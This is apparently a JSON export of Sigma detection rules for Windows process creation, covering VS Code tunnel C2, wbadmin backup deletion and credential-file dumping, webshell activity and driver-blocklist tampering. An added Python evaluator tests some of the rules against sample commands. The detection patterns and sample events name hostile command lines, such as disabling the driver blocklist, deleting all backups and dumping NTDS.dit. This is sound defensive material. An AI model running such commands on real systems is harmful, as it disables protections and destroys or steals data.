    "content": "title: Visual Studio Code Tunnel Shell Execution\nid: f4a623c2-4ef5-4c33-b811-0642f702c9f1\nstatus: test\ndescription: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://code.visualstudio.com/docs/remote/tunnels\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains: '\\servers\\Stable-'\n        ParentImage|endswith: '\\server\\node.exe'\n        ParentCommandLine|contains: '.vscode-server' # Technically one can host its own local server instead of using the VsCode one. And that would probably change the name (requires further research)\n    # Note: Child processes (ie: shells) can be whatever technically (with some efforts)\n    selection_child_1:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains: '\\terminal\\browser\\media\\shellIntegration.ps1'\n    selection_child_2:\n        Image|endswith:\n            - '\\wsl.exe'\n            - '\\bash.exe'\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Legitimate use of Visual Studio Code tunnel and running code from there\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml",
    "content": "title: Renamed Visual Studio Code Tunnel Execution\nid: 2cf29f11-e356-4f61-98c0-1bdb9393d6da\nstatus: test\ndescription: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://code.visualstudio.com/docs/remote/tunnels\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-28\nmodified: 2025-10-29\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1219\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image_only_tunnel:\n        OriginalFileName: null\n        CommandLine|endswith: '.exe tunnel'\n    selection_image_tunnel_args:\n        CommandLine|contains|all:\n            - '.exe tunnel'\n            - '--accept-server-license-terms'\n    selection_image_tunnel_service:\n        CommandLine|contains|all:\n            - 'tunnel '\n            - 'service'\n            - 'internal-run'\n            - 'tunnel-service.log'\n    selection_parent_tunnel:\n        ParentCommandLine|endswith: ' tunnel'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/d /c '\n            - '\\servers\\Stable-'\n            - 'code-server.cmd'\n    filter_main_parent_code:\n        ParentImage|endswith:\n            - '\\code-tunnel.exe'\n            - '\\code.exe'\n    filter_main_image_code:\n        Image|endswith:\n            - '\\code-tunnel.exe'\n            - '\\code.exe'\n    condition: (1 of selection_image_* and not 1 of filter_main_image_*) or (selection_parent_tunnel and not 1 of filter_main_parent_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml",
    "content": "title: Visual Studio Code Tunnel Service Installation\nid: 30bf1789-379d-4fdc-900f-55cd0a90a801\nstatus: test\ndescription: Detects the installation of VsCode tunnel (code-tunnel) as a service.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://code.visualstudio.com/docs/remote/tunnels\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'tunnel '\n            - 'service'\n            - 'internal-run'\n            - 'tunnel-service.log'\n    condition: selection\nfalsepositives:\n    - Legitimate installation of code-tunnel as a service\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml",
    "content": "title: Potential Binary Proxy Execution Via VSDiagnostics.EXE\nid: ac1c92b4-ac81-405a-9978-4604d78cc47e\nstatus: test\ndescription: Detects execution of \"VSDiagnostics.exe\" with the \"start\" command in order to launch and proxy arbitrary binaries.\nreferences:\n    - https://twitter.com/0xBoku/status/1679200664013135872\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\VSDiagnostics.exe'\n        - OriginalFileName: 'VSDiagnostics.exe'\n    selection_cli_start:\n        CommandLine|contains: 'start'\n    selection_cli_launch:\n        CommandLine|contains:\n            - ' /launch:'\n            - ' -launch:'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage for tracing and diagnostics purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vshadow_exec.yml",
    "content": "title: Proxy Execution via Vshadow\nid: d7c75059-2901-4578-b209-8837fd31c6a8\nstatus: experimental\ndescription: |\n    Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.\n    VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,\n    attackers can leverage this parameter to proxy the execution of malware.\nauthor: David Faiss\ndate: 2025-05-26\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/\n    - https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\vshadow.exe'\n        - OriginalFileName: 'vshadow.exe'\n    selection_cli:\n        CommandLine|contains: '-exec'\n    condition: all of selection_*\nfalsepositives:\n    - System backup or administrator tools\n    - Legitimate administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml",
    "content": "title: Suspicious Vsls-Agent Command With AgentExtensionPath Load\nid: 43103702-5886-11ed-9b6a-0242ac120002\nstatus: test\ndescription: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter\nreferences:\n    - https://twitter.com/bohops/status/1583916360404729857\nauthor: bohops\ndate: 2022-10-30\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\vsls-agent.exe'\n        CommandLine|contains: '--agentExtensionPath'\n    filter:\n        CommandLine|contains: 'Microsoft.VisualStudio.LiveShare.Agent.'\n    condition: selection and not filter\nfalsepositives:\n    - False positives depend on custom use of vsls-agent.exe\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering.yml",
    "content": "title: Vulnerable Driver Blocklist Registry Tampering Via CommandLine\nid: 22154f0e-5132-4a54-aa78-cc62f6def531\nrelated:\n    - id: d526c60a-e236-4011-b165-831ffa52ab70\n      type: similar\nstatus: experimental\ndescription: |\n    Detects tampering of the Vulnerable Driver Blocklist registry via command line tools such as PowerShell or REG.EXE.\n    The Vulnerable Driver Blocklist is a security feature that helps prevent the loading of known vulnerable drivers.\n    Disabling this feature may indicate an attempt to bypass security controls, often targeted by threat actors\n    to facilitate the installation of malicious or vulnerable drivers, particularly in scenarios involving Endpoint Detection and Response\nreferences:\n    - https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_cli_1:\n        CommandLine|contains:\n            - 'add '\n            - 'New-ItemProperty '\n            - 'Set-ItemProperty '\n            - 'si '  # SetItem Alias\n    selection_cli_2:\n        CommandLine|contains|all:\n            - '\\Control\\CI\\Config'\n            - 'VulnerableDriverBlocklistEnable'\n    condition: all of selection_*\nfalsepositives:\n    - It is very unlikely for legitimate activities to disable the Vulnerable Driver Blocklist via command line tools; thus it is recommended to investigate promptly.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_w32tm.yml",
    "content": "title: Use of W32tm as Timer\nid: 6da2c9f5-7c53-401b-aacb-92c040ce1215\nstatus: test\ndescription: When configured with suitable command line arguments, w32tm can act as a delay mechanism\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md\n    - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains\nauthor: frack113\ndate: 2022-09-25\ntags:\n    - attack.discovery\n    - attack.t1124\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_w32tm:\n        - Image|endswith: '\\w32tm.exe'\n        - OriginalFileName: 'w32time.dll'\n    selection_cmd:\n        CommandLine|contains|all:\n            - '/stripchart'\n            - '/computer:'\n            - '/period:'\n            - '/dataonly'\n            - '/samples:'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml",
    "content": "title: Wab Execution From Non Default Location\nid: 395907ee-96e5-4666-af2e-2ca91688e151\nstatus: test\ndescription: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity\nreferences:\n    - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\wab.exe'\n            - '\\wabmig.exe'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Program Files\\Windows Mail\\'\n            - 'C:\\Program Files (x86)\\Windows Mail\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml",
    "content": "title: Wab/Wabmig Unusual Parent Or Child Processes\nid: 63d1ccc0-2a43-4f4b-9289-361b308991ff\nstatus: test\ndescription: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity\nreferences:\n    - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            # Add more if known\n            - \\WmiPrvSE.exe\n            - \\svchost.exe\n            - \\dllhost.exe\n        Image|endswith:\n            - '\\wab.exe'\n            - '\\wabmig.exe' # (Microsoft Address Book Import Tool)\n    selection_child:\n        # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy\n        ParentImage|endswith:\n            - '\\wab.exe'\n            - '\\wabmig.exe' # (Microsoft Address Book Import Tool)\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_delete_all_backups.yml",
    "content": "title: All Backups Deleted Via Wbadmin.EXE\nid: 639c9081-f482-47d3-a0bd-ddee3d4ecd76\nrelated:\n    - id: 89f75308-5b1b-4390-b2d8-d6b2340efaf8\n      type: derived\nstatus: test\ndescription: |\n    Detects the deletion of all backups or system state backups via \"wbadmin.exe\".\n    This technique is used by numerous ransomware families and actors.\n    This may only be successful on server platforms that have Windows Backup enabled.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\n    - https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md\n    - https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/\n    - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted\n    - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-13\nmodified: 2024-05-10\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'delete'\n            - 'backup' # Also covers \"SYSTEMSTATEBACKUP\"\n        CommandLine|contains: 'keepVersions:0'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_delete_backups.yml",
    "content": "title: Windows Backup Deleted Via Wbadmin.EXE\nid: 89f75308-5b1b-4390-b2d8-d6b2340efaf8\nrelated:\n    - id: 639c9081-f482-47d3-a0bd-ddee3d4ecd76\n      type: derived\nstatus: test\ndescription: |\n    Detects the deletion of backups or system state backups via \"wbadmin.exe\".\n    This technique is used by numerous ransomware families and actors.\n    This may only be successful on server platforms that have Windows Backup enabled.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\n    - https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md\n    - https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/\n    - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted\n    - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-13\nmodified: 2024-05-10\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'delete '\n            - 'backup' # Also covers \"SYSTEMSTATEBACKUP\"\n    filter_main_keep_versions:\n        # Note: We exclude this to avoid duplicate alerts with 639c9081-f482-47d3-a0bd-ddee3d4ecd76\n        
CommandLine|contains: 'keepVersions:0'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate backup activity from administration scripts and software.\nlevel: medium\n"
  },
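The driver-blocklist rule above and the two wbadmin rules show the Sigma matching details that decide whether an alert fires: case-insensitive string modifiers (`endswith`, `contains`, `contains|all`), OR across a list of values, OR across a list of maps, AND across the fields of one map, and a `filter_main_*` section used only to keep 89f75308 from duplicating 639c9081. The following is an added example, not SigmaHQ project code or the pySigma engine: a deliberately small evaluator that implements just that subset and runs the three detection sections over constructed process_creation events (paths and command lines are made up; the `si ` alias case is not exercised). Conditions are written as Python functions instead of being parsed from the Sigma condition grammar.

```python
"""Minimal evaluator for the Sigma matching semantics used by the rules above.

Constructed example, not SigmaHQ code. Subset implemented: case-insensitive
string comparison (Sigma's default), a list of values under one field is OR,
the fields of one map are AND, a selection written as a list of maps is OR
across the maps, and the |all modifier turns a value list into AND.
"""
from typing import Any, Union

Selection = Union[dict, list]


def _match_value(modifiers: list, pattern: str, value: str) -> bool:
    """Apply one Sigma string modifier case-insensitively."""
    p, v = pattern.lower(), value.lower()
    if "endswith" in modifiers:
        return v.endswith(p)
    if "startswith" in modifiers:
        return v.startswith(p)
    if "contains" in modifiers:
        return p in v
    return v == p


def _match_field(key: str, patterns: Any, event: dict) -> bool:
    """'Field|mod1|mod2': value(s) -> bool; a field missing from the event never matches."""
    field, *modifiers = key.split("|")
    value = event.get(field)
    if value is None:
        return False
    patterns = patterns if isinstance(patterns, list) else [patterns]
    hits = [_match_value(modifiers, str(p), str(value)) for p in patterns]
    return all(hits) if "all" in modifiers else any(hits)


def match_selection(selection: Selection, event: dict) -> bool:
    if isinstance(selection, list):  # list of maps: any map may match
        return any(match_selection(s, event) for s in selection)
    return all(_match_field(k, v, event) for k, v in selection.items())


def all_of(rule: dict, prefix: str, event: dict) -> bool:
    sels = [s for name, s in rule.items() if name.startswith(prefix)]
    return bool(sels) and all(match_selection(s, event) for s in sels)


def one_of(rule: dict, prefix: str, event: dict) -> bool:
    return any(match_selection(s, event) for name, s in rule.items() if name.startswith(prefix))


# Detection sections transcribed from rules 22154f0e, 639c9081 and 89f75308 above.
WBADMIN_IMG = [{"Image|endswith": "\\wbadmin.exe"}, {"OriginalFileName": "WBADMIN.EXE"}]

DRIVER_BLOCKLIST_TAMPERING = {
    "selection_img": [
        {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe", "\\reg.exe"]},
        {"OriginalFileName": ["PowerShell.EXE", "pwsh.dll", "reg.exe"]},
    ],
    "selection_cli_1": {"CommandLine|contains": ["add ", "New-ItemProperty ", "Set-ItemProperty ", "si "]},
    "selection_cli_2": {"CommandLine|contains|all": ["\\Control\\CI\\Config", "VulnerableDriverBlocklistEnable"]},
}
WBADMIN_DELETE_ALL = {  # 639c9081: condition "all of selection_*"
    "selection_img": WBADMIN_IMG,
    "selection_cli": {"CommandLine|contains|all": ["delete", "backup"], "CommandLine|contains": "keepVersions:0"},
}
WBADMIN_DELETE = {  # 89f75308: condition "all of selection_* and not 1 of filter_main_*"
    "selection_img": WBADMIN_IMG,
    "selection_cli": {"CommandLine|contains|all": ["delete ", "backup"]},
    "filter_main_keep_versions": {"CommandLine|contains": "keepVersions:0"},
}

RULES = {
    "Vulnerable Driver Blocklist Registry Tampering Via CommandLine":
        lambda e: all_of(DRIVER_BLOCKLIST_TAMPERING, "selection_", e),
    "All Backups Deleted Via Wbadmin.EXE":
        lambda e: all_of(WBADMIN_DELETE_ALL, "selection_", e),
    "Windows Backup Deleted Via Wbadmin.EXE":
        lambda e: all_of(WBADMIN_DELETE, "selection_", e) and not one_of(WBADMIN_DELETE, "filter_main_", e),
}


def evaluate(event: dict) -> list:
    """Titles of the rules that fire on one process_creation event."""
    return [title for title, cond in RULES.items() if cond(event)]


# Constructed process_creation events; paths and command lines are made up for the example.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config" /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 0 /f'},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -c Set-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config -Name VulnerableDriverBlocklistEnable -Value 0"},
    {"Image": "C:\\Windows\\System32\\reg.exe", "OriginalFileName": "reg.exe",  # read-only query: must not fire
     "CommandLine": "reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config /v VulnerableDriverBlocklistEnable"},
    {"Image": "C:\\Windows\\System32\\wbadmin.exe", "OriginalFileName": "WBADMIN.EXE",
     "CommandLine": "wbadmin delete systemstatebackup -keepVersions:0 -quiet"},
    {"Image": "C:\\Windows\\System32\\wbadmin.exe", "OriginalFileName": "WBADMIN.EXE",
     "CommandLine": "wbadmin delete backup -version:01/15/2024-02:00 -quiet"},
]

if __name__ == "__main__":
    for event in EVENTS:
        print(event["CommandLine"][:60].ljust(60), "->", evaluate(event) or "no match")
```

Running the block shows the `keepVersions:0` command firing only the "All Backups" rule and the versioned delete firing only the "Windows Backup" rule, which is the dedup the filter comment in 89f75308 describes; the `reg query` line matches `selection_img` and `selection_cli_2` but fails `selection_cli_1`, so it stays silent.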
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml",
    "content": "title: Sensitive File Dump Via Wbadmin.EXE\nid: 8b93a509-1cb8-42e1-97aa-ee24224cdc15\nstatus: test\ndescription: |\n    Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\n    Attackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml\n    - https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-05-10\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_backup:\n        CommandLine|contains:\n            - 'start'\n            - 'backup'\n    selection_path:\n        CommandLine|contains:\n            - '\\config\\SAM'\n            - '\\config\\SECURITY'\n            - '\\config\\SYSTEM'\n            - '\\Windows\\NTDS\\NTDS.dit'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml",
    "content": "title: File Recovery From Backup Via Wbadmin.EXE\nid: 6fe4aa1e-0531-4510-8be2-782154b73b48\nrelated:\n    - id: 84972c80-251c-4c3a-9079-4f00aad93938\n      type: derived\nstatus: test\ndescription: |\n    Detects the recovery of files from backups via \"wbadmin.exe\".\n    Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery\n    - https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-05-10\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' recovery'\n            - 'recoveryTarget'\n            - 'itemtype:File'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml",
    "content": "title: Sensitive File Recovery From Backup Via Wbadmin.EXE\nid: 84972c80-251c-4c3a-9079-4f00aad93938\nrelated:\n    - id: 6fe4aa1e-0531-4510-8be2-782154b73b48\n      type: derived\nstatus: test\ndescription: |\n    Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\n    Attackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml\n    - https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-05-10\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_backup:\n        CommandLine|contains|all:\n            - ' recovery'\n            - 'recoveryTarget'\n            - 'itemtype:File'\n        CommandLine|contains:\n            - '\\config\\SAM'\n            - '\\config\\SECURITY'\n            - '\\config\\SYSTEM'\n            - '\\Windows\\NTDS\\NTDS.dit'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml",
    "content": "title: Potentially Suspicious WebDAV LNK Execution\nid: 1412aa78-a24c-4abd-83df-767dfb2c5bbe\nrelated:\n    - id: f0507c0f-a3a2-40f5-acc6-7f543c334993\n      type: similar\nstatus: test\ndescription: Detects possible execution via LNK file accessed on a WebDAV server.\nreferences:\n    - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\n    - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\nauthor: Micah Babinski\ndate: 2023-08-21\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1204\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\explorer.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        CommandLine|contains: '\\DavWWWRoot\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_chopper.yml",
    "content": "title: Chopper Webshell Process Pattern\nid: fa3c117a-bc0d-416e-a31b-0c0e80653efb\nstatus: test\ndescription: Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/\nauthor: Florian Roth (Nextron Systems), MSTI (query)\ndate: 2022-10-01\ntags:\n    - attack.persistence\n    - attack.discovery\n    - attack.t1505.003\n    - attack.t1018\n    - attack.t1033\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_origin:\n        - Image|endswith: '\\w3wp.exe'\n        - ParentImage|endswith: '\\w3wp.exe'\n    selection_cmdline:\n        CommandLine|contains:\n            - '&ipconfig&echo'\n            - '&quser&echo'\n            - '&whoami&echo'\n            - '&c:&echo'\n            - '&cd&echo'\n            - '&dir&echo'\n            - '&echo [E]'\n            - '&echo [S]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_hacking.yml",
    "content": "title: Webshell Hacking Activity Patterns\nid: 4ebc877f-4612-45cb-b3a5-8e3834db36c9\nstatus: test\ndescription: |\n    Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system\nreferences:\n    - https://youtu.be/7aemGhaE9ds?t=641\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-17\nmodified: 2023-11-09\ntags:\n    - attack.persistence\n    - attack.discovery\n    - attack.t1505.003\n    - attack.t1018\n    - attack.t1033\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n   # Webserver\n    selection_webserver_image:\n        ParentImage|endswith:\n            - '\\caddy.exe'\n            - '\\httpd.exe'\n            - '\\nginx.exe'\n            - '\\php-cgi.exe'\n            - '\\w3wp.exe'\n            - '\\ws_tomcatservice.exe'\n    selection_webserver_characteristics_tomcat1:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentImage|contains:\n            - '-tomcat-'\n            - '\\tomcat'\n    selection_webserver_characteristics_tomcat2:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        CommandLine|contains:\n            - 'catalina.jar'\n            - 'CATALINA_HOME'\n    # Suspicious child processes\n    selection_child_1:\n        # Process dumping\n        CommandLine|contains|all:\n            - 'rundll32'\n            - 'comsvcs'\n    selection_child_2:\n        # Winrar exfil\n        CommandLine|contains|all:\n            - ' -hp'\n            - ' a '\n            - ' -m'\n    selection_child_3:\n        # User add\n        